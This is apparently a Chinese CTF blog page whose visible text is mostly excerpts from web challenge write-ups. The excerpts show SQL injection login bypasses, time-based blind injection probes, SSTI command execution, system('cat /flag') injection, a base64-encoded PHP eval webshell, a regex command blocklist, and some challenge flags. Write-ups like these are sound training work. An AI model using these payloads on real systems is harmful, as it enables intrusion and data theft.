0xGame-WP
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yxing!
相关推荐
2025-01-23
BaseCTF-WP
2024HTTP 是什么呀常规的GET,POST传参,改cookie,referer,UA,IP,注意这里如果是GET传参要传入%00,就要先url编码一次,即传入%2500,因为浏览器会自动进行一次url解码 GET /?basectf=we1c%2500me POST Base=fl@gCookie: c00k13=i can't eat itUser-Agent: BaseReferer: BaseX-Forwarded-For:127.0.0.1 base64解码即可 喵喵喵´•ﻌ•`直接GET传参 DT=system('ls /');DT=system('cat /flag'); md5绕过欸直接数组绕过即可,注意第二层为强比较,也可用数组绕过 GET:name[]=1&name2[]=2Post:password[]=3&password2[]=4 A Dark Room源码 upload写个一句话木马存为1.php上传,bp抓包修改文件类型为Content-Type:...
2025-04-26
ACTF-WP
2025WEBnot so web 1题目先随便注册登录进入后base64解码得到源码 import base64, json, timeimport os, sys, binasciifrom dataclasses import dataclass, asdictfrom typing import Dict, Tuplefrom secret import KEY, ADMIN_PASSWORDfrom Crypto.Cipher import AESfrom Crypto.Util.Padding import pad, unpadfrom flask import ( Flask, render_template, render_template_string, request, redirect, url_for, flash, session,)app = Flask(__name__)app.secret_key = KEY@dataclass(kw_only=True)class APPUser: ...
2026-01-04
PCTF-WP
sql_in万能密码绕过即可 POST:password=1&username=admin' or 1# PCTF{fa88f815-81f4-481d-b931-87d74f37d0ce} 复读机测试后发现存在ssti漏洞 直接打就行 POST:cmd={{lipsum.__globals__['os'].popen('env').read()}} PCTF{8ce08c23-f652-49d8-bfdf-4c179e0e05ba} what_is_jsfuck源码中给出提示<!-- Hint:Try entering "I want flag"...
2025-01-22
SYCTF2023&XYNU2024信安杯web
SYCTF2023签到源码 登录进去直接先登录,但是随便试了几个均错误,以为是sql,测了下没测出来,然后直接抓包去试了下弱口令爆破,真成了。。。。 访问index.php,获得flag 宝宝巴士<?php$rce = $_GET['rce'];if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; }} else { ...
2025-01-22
XYCTF-WP
2024ezMake(makefile)写马随便输入 PATH 环境变量被显式地设定为空。这段 Makefile 的逻辑检查了 PATH 是否未定义,如果未定义则设为空,如果已定义也重设为空。由于 PATH 被设置为空,shell 将无法定位到除内置命令之外的任何外部命令的位置。 Bash 内建命令,这些命令是由Bash自身提供,而不是独立的程序: alias - 定义或显示别名。cd - 改变当前目录。echo - 输出参数到标准输出。exit - 退出当前shell。export - 设置或显示环境变量。history - 显示命令历史记录。pwd - 打印当前工作目录的路径。read - 从标准输入读取一行数据。set - 设置或取消设置shell选项和位置参数。type - 显示一个命令的类型。unset - 删除变量或函数的定义。 尝试base64写马 echo "PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4K" | base64 -d > 1.phpecho "<?php...
2025-01-20
湘岚杯&emojiCTF2024web-WP
湘岚杯冷暴力不管输入什么,页面均只回显”嗯”,经典的时间盲注 构造payload为1 and sleep(2)尝试,能够sleep,说明为数字型且sleep未被过滤,构造payload如下 1 and if(1,sleep(2),0)# #能够sleep,说明if、逗号未被过滤1 and if(length(1)=1,sleep(2),0)# #不能sleep,说明length或=被过滤1 and 1=1 and sleep(2)# #能够sleep,说明=未被过滤,尝试大写绕过length1 and if(Length(1)=1,sleep(2),0)# #成功sleep(双写绕过也行)1 and if(substr('1',1,1)='1',sleep(2),0)# #不能sleep,说明substr被过滤,大写或双写绕过尝试1 and if(subsubstrstr('1',1,1)='1',sleep(2),0)# #成功sleep1 and...